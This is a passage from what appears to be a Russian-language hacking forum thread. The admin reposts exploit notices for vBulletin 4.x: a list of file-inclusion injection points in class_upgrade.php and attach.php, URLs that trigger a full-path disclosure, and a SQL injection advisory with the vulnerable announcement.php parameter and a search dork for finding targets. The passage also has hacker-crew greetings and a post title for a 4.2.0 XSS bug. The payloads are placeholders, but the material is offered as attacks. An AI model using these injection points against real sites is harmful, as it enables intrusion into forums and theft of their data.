Exploit: http://localhost/vB1...chosenlib=[EV!L]

##################################################

Function: require_once	File: class_upgrade.php			Line: 48
Exploit: http://localhost/vB1...chosenlib=[EV!L]

##################################################

Function: include_once	File: attach.php			Line: 80
Exploit: http://localhost/vB1...p?package=[EV!L]

##################################################

Function: include_once	File: attach.php			Line: 604
Exploit: http://localhost/vB1....php?path=[EV!L]

##################################################

Function: include_once	File: attach.php			Line: 1222
Exploit: http://localhost/vB1....php?path=[EV!L]

##################################################

Directory Listing ckeditor :

http://localhost/vB1...cript/ckeditor/

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------

Ссылки из под хайдов не выдаю!


#22
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений

vBulletin 4.1.10 Full Path Disclosure

Данный баг раскрывает полный путь к скрипту.
http://localhost/path/forumdisplay.php?do[]=

http://localhost/path/calendar.php?do[]=

http://localhost/path/search.php?do[]=


#23
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений

vBulletin 4.1.10 Sql Injection Vulnerabilitiy

########################################################
#
# Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy
#
# Author		: IrIsT.Ir
#
# Discovered By : Am!r
#
# Home		  : http://IrIsT.Ir
#
# Software Link : http://vbulletin.com
#
# Security Risk : High
#
# Version	   : All Version
#
# Tested on	 : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork		  : "Powered By Vbulletin"
#
########################################################
#
#  Expl0iTs :
#
#  [TarGeT]/announcement.php?a=&announcementid=[Sql]
#
#########################################################
#
# Greats : Zarbat.Org - Aria-Security.Com - datacoders.org - black-hg.org
# 
#	 Security7.ir - AjaxTm.Com - Sepehr-Team.Org And All Iranian Hackers
#
#########################################################


#24
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
vBulletin 4.2.0 XSS Vulnerability


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных